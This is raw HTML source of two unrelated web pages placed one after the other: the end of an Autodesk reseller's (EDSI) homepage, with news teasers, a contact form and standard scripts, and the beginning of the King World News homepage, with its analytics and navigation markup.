src="https://www.edsi.com/wp-content/uploads/2016/04/image1-2-e1491407201401-370x280.jpg" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/new-edsi-roanoke-office/" title="Permalink to New EDSI Roanoke Office!" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">July 25, 2016</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/new-edsi-roanoke-office/">New EDSI Roanoke Office!</a></h2><span class="entry-meta">By edsihosting</span></td></tr></table></div><div class="entry-excerpt">We’ve Moved! The EDSI Team is excited to announce that we have moved our corporate offices. We started EDSI in 1987 at the Peters Creek Road<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/new-edsi-roanoke-office/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" src="https://www.edsi.com/wp-content/uploads/2016/05/bluebeam-370x280.png" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="Bluebeam partner - Engineering Design Systems" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/new-partnership-bluebeam/" title="Permalink to New EDSI Partnership: Bluebeam" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">May 5, 2016</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/new-partnership-bluebeam/">New EDSI Partnership: Bluebeam</a></h2><span class="entry-meta">By edsihosting</span></td></tr></table></div><div class="entry-excerpt">&nbsp; Strategic Partnership to Bring PDF Workflow Solutions to our clients Roanoke, VA—May 5th, 2016— Autodesk Gold Reseller Engineering De<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/new-partnership-bluebeam/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" src="https://www.edsi.com/wp-content/uploads/2017/04/lakeland-370x280.jpg" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/new-edsi-locations-employees/" title="Permalink to New EDSI Locations &#038; Employees" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">April 6, 2016</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/new-edsi-locations-employees/">New EDSI Locations &#038; Employees</a></h2><span class="entry-meta">By edsihosting</span></td></tr></table></div><div class="entry-excerpt">Autodesk Gold Reseller, Engineering Design Systems, Inc., Acquires Lakeland Technical Services, Inc. EDSI expands local service capabilities<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/new-edsi-locations-employees/">Learn more</a></span></div> </div> </div> </div> </div> </div><!-- .apex-blog-archive --> </article> </div><!-- .primary --> </div> </div> </div> </section> <section id="apex-page-123" class="apex-section apex-section-page apex-layout-full-width apex-width-normal apex-style-dark apex-mobile-sidebar-default" data-mtphr-parallax-speed="6"> <div class="apex-section-overlay"></div> <div class="apex-section-inner"> <div class="container"> <div class="section-header wow fadeIn" data-wow-delay=".25"><h1 class="section-title">Contact Us</h1></div> <div class="wow fadeIn row" data-wow-delay=".25"> <div class="col-sm-12 primary"> <article> <div class="entry-content clearfix"> <div class='mailmunch-forms-before-post' style='display: none !important;'></div> <h2 style="text-align: center;"><span style="color: #ffffff;">Give EDSI A Call: 540-345-1410</span></h2> <p><div role="form" class="wpcf7" id="wpcf7-f320-o1" lang="en-US" dir="ltr"> <div class="screen-reader-response"></div> <form action="/#wpcf7-f320-o1" method="post" class="wpcf7-form" novalidate="novalidate"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="320" /> <input type="hidden" name="_wpcf7_version" value="5.0.3" /> <input type="hidden" name="_wpcf7_locale" value="en_US" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f320-o1" /> <input type="hidden" name="_wpcf7_container_post" value="0" /> </div> <div class="form-group"> <span class="wpcf7-form-control-wrap your-name"><input type="text" name="your-name" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control" aria-required="true" aria-invalid="false" placeholder="Your name" /></span> </div> <div class="form-group"> <span class="wpcf7-form-control-wrap your-email"><input type="email" name="your-email" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email form-control" aria-required="true" aria-invalid="false" placeholder="Your email" /></span> </div> <div class="form-group"> <span class="wpcf7-form-control-wrap your-message"><textarea name="your-message" cols="40" rows="10" class="wpcf7-form-control wpcf7-textarea wpcf7-validates-as-required form-control" aria-required="true" aria-invalid="false" placeholder="Your message"></textarea></span> </div> <div class="form-group mobile-align-center"> <input type="submit" value="Send Message" class="wpcf7-form-control wpcf7-submit btn" /> </div> <div class="wpcf7-response-output wpcf7-display-none"></div></form></div></p> <div class='mailmunch-forms-in-post-middle' style='display: none !important;'></div> <div class='mailmunch-forms-after-post' style='display: none !important;'></div> </div><!-- .entry-content --> </article> </div><!-- .primary --> </div> </div> </div> </section> </div><!-- #main --> <footer id="site-footer" class="apex-style-dark" role="contentinfo"> <div class="container"> <div class="row"> <div id="apex-social-links" class="col-sm-6 col-sm-push-6 clearfix" role="complementary"><div class="wrapper clearfix"><a class="mtphr-social-widget-site mtphr-social-widget-twitter" href="https://twitter.com/EngDesignSystem" target="_blank"><i class="metaphor-widgets-ico-twitter"></i></a><a class="mtphr-social-widget-site mtphr-social-widget-facebook" href="https://www.facebook.com/EngineeringDesignSystemsInc/" target="_blank"><i class="metaphor-widgets-ico-facebook"></i></a><a class="mtphr-social-widget-site mtphr-social-widget-linkedin" href="https://www.linkedin.com/company/engineering-design-systems-inc" target="_blank"><i class="metaphor-widgets-ico-linkedin"></i></a><a class="mtphr-social-widget-site mtphr-social-widget-youtube" href="https://www.youtube.com/channel/UCkJ7-Sbji64Dwke89L1R8Lw" target="_blank"><i class="metaphor-widgets-ico-youtube"></i></a></div></div><div id="apex-copyright" class="col-sm-6 col-sm-pull-6" role="complementary"><div class="wrapper clearfix"><p>Copyright &copy; 2017 EDSI. All Rights Reserved.<br />Powered by <a href="http://www.cyberfluent.net" target="_blank">Cyberfluent</a></p> </div></div> </div><!-- .row --> </div><!-- .container --> </footer><!-- #site-footer --> </div><!-- #wrapper --> <a id="apex-totop-float" href="#"><i class="apex-icon-arrow-up"></i></a> <script type="text/javascript"> if(typeof jQuery == 'undefined' || typeof jQuery.fn.on == 'undefined') { document.write('<script src="https://www.edsi.com/wp-includes/js/jquery/jquery.js"><\/script>'); document.write('<script src="https://www.edsi.com/wp-includes/js/jquery/jquery-migrate.min.js"><\/script>'); } </script> <script type='text/javascript' src='https://www.edsi.com/wp-content/plugins/beaver-builder-lite-version/js/jquery.easing.min.js?ver=1.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var mtphr_post_slider_vars = {"is_rtl":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.edsi.com/wp-content/plugins/mtphr-shortcodes/assets/js/mtphr-post-slider.js?ver=2.2.8'></script> <script>jQuery( window ).load( function() {jQuery('#mtphr-post-slider-1515783aaa5acca681569b2d8063420f').mtphr_post_slider({slide_speed : 1000,slide_ease : 'easeOutExpo'});});</script><!-- Global site tag (gtag.js) - Google Analytics --> <script src="https://www.googletagmanager.com/gtag/js?id=UA-138995584-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-138995584-1'); </script> <script type='text/javascript' src='https://www.edsi.com/wp-content/uploads/bb-plugin/cache/125-layout.js?ver=ae645327eaa716dbfd2fb544a6fd91df'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.edsi.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.edsi.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3'></script> <script type='text/javascript' src='https://www.edsi.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.2'></script> <script type='text/javascript' src='https://www.edsi.com/wp-content/plugins/mtphr-galleries/assets/js/mtphr-gallery-slider.js?ver=1491230279'></script> <script type='text/javascript'> /* <![CDATA[ */ var mtphr_galleries_vars = {"security":"f36cfb7515"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.edsi.com/wp-content/plugins/mtphr-galleries/assets/js/script.js?ver=1491230279'></script> <script type='text/javascript' src='https://www.edsi.com/wp-content/plugins/mtphr-galleries/assets/js/respond.min.js?ver=1.1.0'></script> <script type='text/javascript' src='https://www.edsi.com/wp-content/plugins/ditty-news-ticker/assets/js/jquery.touchSwipe.min.js?ver=2.0.18'></script> <script type='text/javascript' src='https://www.edsi.com/wp-content/plugins/mtphr-widgets/assets/js/script.js?ver=2.2.1'></script> <script type='text/javascript' src='https://www.edsi.com/wp-content/themes/digitalscience-apex/assets/bootstrap/js/bootstrap.min.js?ver=1.1.23'></script> <script type='text/javascript' src='https://www.edsi.com/wp-content/themes/digitalscience-apex/assets/js/wow.min.js?ver=1.1.23'></script> <script type='text/javascript' src='https://www.edsi.com/wp-content/themes/digitalscience-apex/assets/mtphr-parallax/mtphr-parallax.js?ver=1.1.23'></script> <script type='text/javascript' src='https://www.edsi.com/wp-content/themes/digitalscience-apex/assets/js/jquery.fitvids.min.js?ver=1.1.23'></script> <script type='text/javascript' src='https://www.edsi.com/wp-content/themes/digitalscience-apex/assets/js/imagesloaded.pkgd.min.js?ver=1.1.23'></script> <script type='text/javascript' src='https://www.edsi.com/wp-content/themes/digitalscience-apex/assets/js/isotope.pkgd.min.js?ver=1.1.23'></script> <script type='text/javascript'> /* <![CDATA[ */ var apex_vars = {"security":"f0ed45d3d0","home_url":"https:\/\/www.edsi.com","page_title":"Home","menu_scroll":"1","hide_nav":"0","is_rtl":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.edsi.com/wp-content/themes/digitalscience-apex/assets/js/script.js?ver=1.1.23'></script> <script type='text/javascript' src='//platform.twitter.com/widgets.js?ver=2.1.0'></script> <script type='text/javascript' src='https://www.edsi.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' src='https://www.edsi.com/wp-content/plugins/ditty-news-ticker/assets/js/imagesloaded.pkgd.min.js?ver=2.0.18'></script> <script type='text/javascript' src='https://www.edsi.com/wp-content/plugins/ditty-news-ticker/assets/js/ditty-news-ticker.js?ver=2.0.18'></script> <script> jQuery( document ).ready( function($) { $( '#mtphr-dnt-179-apex-hero' ).ditty_news_ticker({ id : '179-apex-hero', type : 'rotate', scroll_direction : 'left', scroll_speed : 10, scroll_pause : 0, scroll_spacing : 40, scroll_init : 0, rotate_type : 'fade', auto_rotate : 0, rotate_delay : 7, rotate_pause : 0, rotate_speed : 10, rotate_ease : 'linear', nav_reverse : 0, disable_touchswipe : 0, offset : 20, after_load : function( $ticker ) { }, before_change : function( $ticker ) { }, after_change : function( $ticker ) { } }); $( '#mtphr-dnt-178-apex-hero' ).ditty_news_ticker({ id : '178-apex-hero', type : 'rotate', scroll_direction : 'left', scroll_speed : 10, scroll_pause : 0, scroll_spacing : 40, scroll_init : 0, rotate_type : 'slide_up', auto_rotate : 1, rotate_delay : 7, rotate_pause : 0, rotate_speed : 10, rotate_ease : 'easeInOutQuint', nav_reverse : 1, disable_touchswipe : 0, offset : 20, after_load : function( $ticker ) { }, before_change : function( $ticker ) { }, after_change : function( $ticker ) { } }); $( '#mtphr-dnt-389' ).ditty_news_ticker({ id : '389', type : 'rotate', scroll_direction : 'left', scroll_speed : 10, scroll_pause : 0, scroll_spacing : 40, scroll_init : 0, rotate_type : 'slide_left', auto_rotate : 0, rotate_delay : 7, rotate_pause : 0, rotate_speed : 10, rotate_ease : 'easeInOutQuint', nav_reverse : 1, disable_touchswipe : 0, offset : 20, after_load : function( $ticker ) { }, before_change : function( $ticker ) { }, after_change : function( $ticker ) { } }); }); </script> <script type="text/javascript"> jQuery( document ).ready( function($) { (function() { "use strict"; var wow = new WOW({ offset: 150, mobile: false }); wow.init(); $('html.no-touch *[data-mtphr-parallax-speed]').mtphr_parallax(); //$('.mtphr-gallery').mtphr_gallery(); $('article').fitVids(); }()); }); jQuery( window ).load( function() { (function() { "use strict"; jQuery('#hero-rotator .mtphr-dnt').on('mtphr_dnt_before_change_single', function( e, vars ) { jQuery('#hero-bg-rotator .mtphr-dnt').trigger('mtphr_dnt_goto', [vars.next_tick]); }); }()); }); </script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <title> King World News </title> <meta content="text/html" charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1"> <link rel="shortcut icon" href="https://kingworldnews.com/wp-content/uploads/2014/12/KWN-Flavicon-2015-copy.jpg" type="image/x-icon" /> <link rel="alternate" type="application/rss+xml" href="https://kingworldnews.com/feed/" title="King World News latest posts" /> <link rel="alternate" type="application/rss+xml" href="https://kingworldnews.com/comments/feed/" title="King World News latest comments" /> <link rel="pingback" href="https://kingworldnews.com/xmlrpc.php" /> <script type="text/javascript"> var ajaxurl = 'https://kingworldnews.com/wp-admin/admin-ajax.php'; </script> <link rel="canonical" href="https://kingworldnews.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Homepage - King World News" /> <meta property="og:url" content="https://kingworldnews.com/" /> <meta property="og:site_name" content="King World News" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/kingworldnews.com\/","name":"King World News","potentialAction":{"@type":"SearchAction","target":"https:\/\/kingworldnews.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <link rel='dns-prefetch' href='//html5shiv.googlecode.com' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="King World News &raquo; Feed" href="https://kingworldnews.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="King World News &raquo; Comments Feed" href="https://kingworldnews.com/comments/feed/" /> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.6.1'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-36134553-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-36134553-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/kingworldnews.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='simple-share-buttons-adder-font-awesome-css' href='//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='parent-style-css' href='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/style.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='mv-gallery-style-css' href='https://kingworldnews.com/wp-content/themes/Yaaburnee-Child-Theme/includes/mv-gallery/style.min.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='google-fonts-2-css' href='https://fonts.googleapis.com/css?family=Roboto+Slab&#038;ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='main-style-css' href='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/css/style.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='layout-css' href='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/css/layout.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='background-css' href='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/css/background.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='mobile-css' href='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/css/mobile.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='icons-css' href='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/css/icons.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='lightbox-css' href='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/css/lightbox.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='df-width-1200-css' href='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/css/1200.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='fonts-css' href='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/css/fonts.php?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='df-dynamic-css-css' href='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/css/dynamic-css.php?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='style-css' href='https://kingworldnews.com/wp-content/themes/Yaaburnee-Child-Theme/style.css?ver=4.9.10' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"https:\/\/kingworldnews.com","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/plugins/google-analytics-premium/assets/js/frontend.min.js?ver=7.6.1'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/Yaaburnee-Child-Theme/includes/mv-gallery/mvgallery-bundle.min.js?ver=4.9.10'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/Yaaburnee-Child-Theme/includes/mv-gallery/lightboxz.js?ver=4.9.10'></script> <!--[if lt IE 9]> <script type='text/javascript' src='http://html5shiv.googlecode.com/svn/trunk/html5.js?ver=4.9.10'></script> <![endif]--> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/jquery.flickr.js?ver=4.9.10'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/jquery.fitvids.js?ver=4.9.10'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/jquery.ui.js?ver=4.9.10'></script> <link rel='https://api.w.org/' href='https://kingworldnews.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://kingworldnews.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://kingworldnews.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.10" /> <link rel='shortlink' href='https://kingworldnews.com/' /> <link rel="alternate" type="application/json+oembed" href="https://kingworldnews.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fkingworldnews.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://kingworldnews.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fkingworldnews.com%2F&#038;format=xml" /> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-35188901-1', 'auto'); ga('send', 'pageview'); </script> </head> <body class="home page-template page-template-template-homepage page-template-template-homepage-php page page-id-7"> <div id="wrapper" class="wide"> <div style="padding-top: 20px;"></div> <header id="header" class="normal container"> <div id="logo"> <a href="https://kingworldnews.com"> <img src="https://kingworldnews.com/wp-content/uploads/2014/02/King-World-News®.png" alt="King World News"> </a> </div> </header> <nav id="primary-navigation" class="light"> <div class="inner"> <a class="click-to-open-menu"><i class="fa fa-align-justify"></i></a> <ul class="primary-navigation"><li id="menu-item-17" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-7 current_page_item current-menu-ancestor current-menu-parent current_page_parent current_page_ancestor menu-item-has-children menu-parent"><span style="background-color: #0000A6"></span><a href="https://kingworldnews.com/">KWN HOME</a> <ul class="sub-menu"> <li id="menu-item-181974" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-7 current_page_item"><a href="https://kingworldnews.com/">KING WORLD NEWS</a></li> </ul> </li> <li id="menu-item-339" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent"><span style="background-color: #FF8800"></span><a href="https://kingworldnews.com/health/">HEALTH</a> <ul class="sub-menu"> <li id="menu-item-181973" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://kingworldnews.com/health/">KWN HEALTH</a></li> <li id="menu-item-17908" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/health-alt/">HEALTH</a></li> </ul> </li> <li id="menu-item-654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent"><span style="background-color: #00CC00"></span><a href="https://kingworldnews.com/money/">MONEY</a> <ul class="sub-menu"> <li id="menu-item-181976" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://kingworldnews.com/money/">KWN MONEY</a></li> <li id="menu-item-17911" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/money-msm/">MONEY</a></li> </ul> </li> <li id="menu-item-653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent"><span style="background-color: #3399FF"></span><a href="https://kingworldnews.com/tech/">TECH</a> <ul class="sub-menu"> <li id="menu-item-181979" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://kingworldnews.com/tech/">KWN TECH</a></li> <li id="menu-item-17914" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/tech-msm/">TECH</a></li> </ul> </li> <li id="menu-item-652" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent"><span style="background-color: #E411AF"></span><a href="https://kingworldnews.com/kwn-plus/">KWN+</a> <ul class="sub-menu"> <li id="menu-item-181975" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://kingworldnews.com/kwn-plus/">KWN PLUS</a></li> <li id="menu-item-152959" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/kwn-videos/">KWN VIDEOS</a></li> <li id="menu-item-17904" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/entertainment/">KWN ENTERTAINMENT</a></li> <li id="menu-item-17905" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/entertainment-msm/">ENTERTAINMENT</a></li> </ul> </li> <li id="menu-item-657" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent"><span style="background-color: #FFDC14"></span><a href="https://kingworldnews.com/gold/">GOLD</a> <ul class="sub-menu"> <li id="menu-item-181972" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://kingworldnews.com/gold/">KWN GOLD</a></li> <li id="menu-item-101009" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/gold-msm/">GOLD</a></li> <li id="menu-item-101010" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/silver-msm/">SILVER</a></li> <li id="menu-item-168823" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/energy-msm/">ENERGY</a></li> </ul> </li> <li id="menu-item-650" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent"><span style="background-color: #30ED8F"></span><a href="https://kingworldnews.com/wealth/">WEALTH</a> <ul class="sub-menu"> <li id="menu-item-181981" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://kingworldnews.com/wealth/">KWN WEALTH</a></li> <li id="menu-item-159376" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/autos/">AUTOS</a></li> <li id="menu-item-96239" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/real-estate/">REAL ESTATE</a></li> <li id="menu-item-96238" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/luxury/">LUXURY</a></li> </ul> </li> <li id="menu-item-649" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent"><span style="background-color: #E60A0A"></span><a href="https://kingworldnews.com/sports/">SPORTS</a> <ul class="sub-menu"> <li id="menu-item-181978" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://kingworldnews.com/sports/">SPORTS</a></li> <li id="menu-item-17909" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/sports-world/">SPORTS (WORLD)</a></li> </ul> </li> <li id="menu-item-648" class="menu-item menu-item-type-post_type 